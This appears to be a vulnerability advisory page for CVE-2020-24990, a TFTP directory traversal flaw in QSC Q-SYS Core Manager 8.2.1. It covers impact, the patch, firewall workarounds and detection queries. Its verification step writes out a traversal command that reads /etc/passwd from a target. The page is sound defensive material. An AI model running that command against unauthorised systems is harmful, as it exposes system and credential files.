CVE-2020-24990 – CVE-2020-24990 is a directory traversal vulnera... (How to Fix)

Q: What is the severity of CVE-2020-24990?

CVE-2020-24990 has a CVSS score of 7.5 (HIGH). CVE-2020-24990 is a directory traversal vulnerability in QSC Q-SYS Core Manager that allows remote attackers to read sensitive operating system files via TFTP GET requests. This affects QSC Q-SYS Core Manager version 8.2.1. Attackers can exploit this to access files like /etc/passwd or /proc/version without authentication.

📋 TL;DR

CVE-2020-24990 is a directory traversal vulnerability in QSC Q-SYS Core Manager that allows remote attackers to read sensitive operating system files via TFTP GET requests. This affects QSC Q-SYS Core Manager version 8.2.1. Attackers can exploit this to access files like /etc/passwd or /proc/version without authentication.

💻 Affected Systems

Products:

QSC Q-SYS Core Manager

Versions: 8.2.1

Operating Systems: Linux-based Q-SYS OS

Default Config Vulnerable: ⚠️ Yes

Notes: TFTP service runs on UDP port 69 by default in vulnerable configurations.

📦 What is this software?

Q Sys Core Manager by Qsc

View all CVEs affecting Q Sys Core Manager →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise through reading sensitive configuration files, password files, or obtaining credentials that could lead to further attacks.

🟠

Likely Case

Information disclosure of system files, potential credential harvesting, and reconnaissance for further attacks.

🟢

If Mitigated

Limited impact with proper network segmentation and access controls preventing unauthorized TFTP access.

🌐 Internet-Facing: HIGH - The vulnerability is unauthenticated and exploitable over network, making internet-facing systems particularly vulnerable.

🏢 Internal Only: MEDIUM - Internal systems are still vulnerable but may have additional network controls reducing exposure.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires only TFTP client access and knowledge of directory traversal techniques.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 8.2.2 or later

Vendor Advisory: https://q-syshelp.qsc.com/Content/Core_Manager/CoreManager_Overview.htm

Restart Required: Yes

Instructions:

1. Download latest Q-SYS Core Manager software from QSC website. 2. Backup current configuration. 3. Install updated version. 4. Restart system. 5. Verify TFTP service no longer allows directory traversal.

🔧 Temporary Workarounds

Block TFTP Access

linux

Restrict network access to TFTP service (UDP port 69) using firewall rules.

iptables -A INPUT -p udp --dport 69 -j DROP
ufw deny 69/udp

Disable TFTP Service

linux

Disable the TFTP service if not required for operations.

systemctl disable tftpd
service tftpd stop

🧯 If You Can't Patch

Implement strict network segmentation to isolate Q-SYS systems from untrusted networks
Deploy network-based intrusion detection to monitor for TFTP directory traversal attempts

🔍 How to Verify

Check if Vulnerable:

Attempt TFTP GET request with directory traversal payload: tftp <target_ip> get ../../../../etc/passwd testfile

Check Version:

Check Q-SYS Core Manager version in web interface or via SSH: cat /etc/qsc_version

Verify Fix Applied:

Attempt same directory traversal after patch - should receive access denied or file not found error

📡 Detection & Monitoring

Log Indicators:

TFTP access logs showing GET requests with ../ patterns
Failed file access attempts in system logs

Network Indicators:

TFTP traffic to UDP port 69 with ../ in packet payloads
Unusual TFTP GET requests from external sources

SIEM Query:

source_port=69 AND (payload CONTAINS "../" OR payload CONTAINS "..\")

📊 Metadata

CVE ID: CVE-2020-24990

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: CWE-22

Published: October 28, 2020

Last Updated: November 21, 2024

🔗 References

http://packetstormsecurity.com/files/159699/QSC-Q-SYS-Core-Manager-8.2.1-Directory-Traversal.html Third Party Advisory,VDB Entry
http://seclists.org/fulldisclosure/2020/Oct/30 Mailing List,Third Party Advisory
https://q-syshelp.qsc.com/Content/Core_Manager/CoreManager_Overview.htm Vendor Advisory
http://packetstormsecurity.com/files/159699/QSC-Q-SYS-Core-Manager-8.2.1-Directory-Traversal.html Third Party Advisory,VDB Entry
http://seclists.org/fulldisclosure/2020/Oct/30 Mailing List,Third Party Advisory
https://q-syshelp.qsc.com/Content/Core_Manager/CoreManager_Overview.htm Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-24990, you might also want to check these: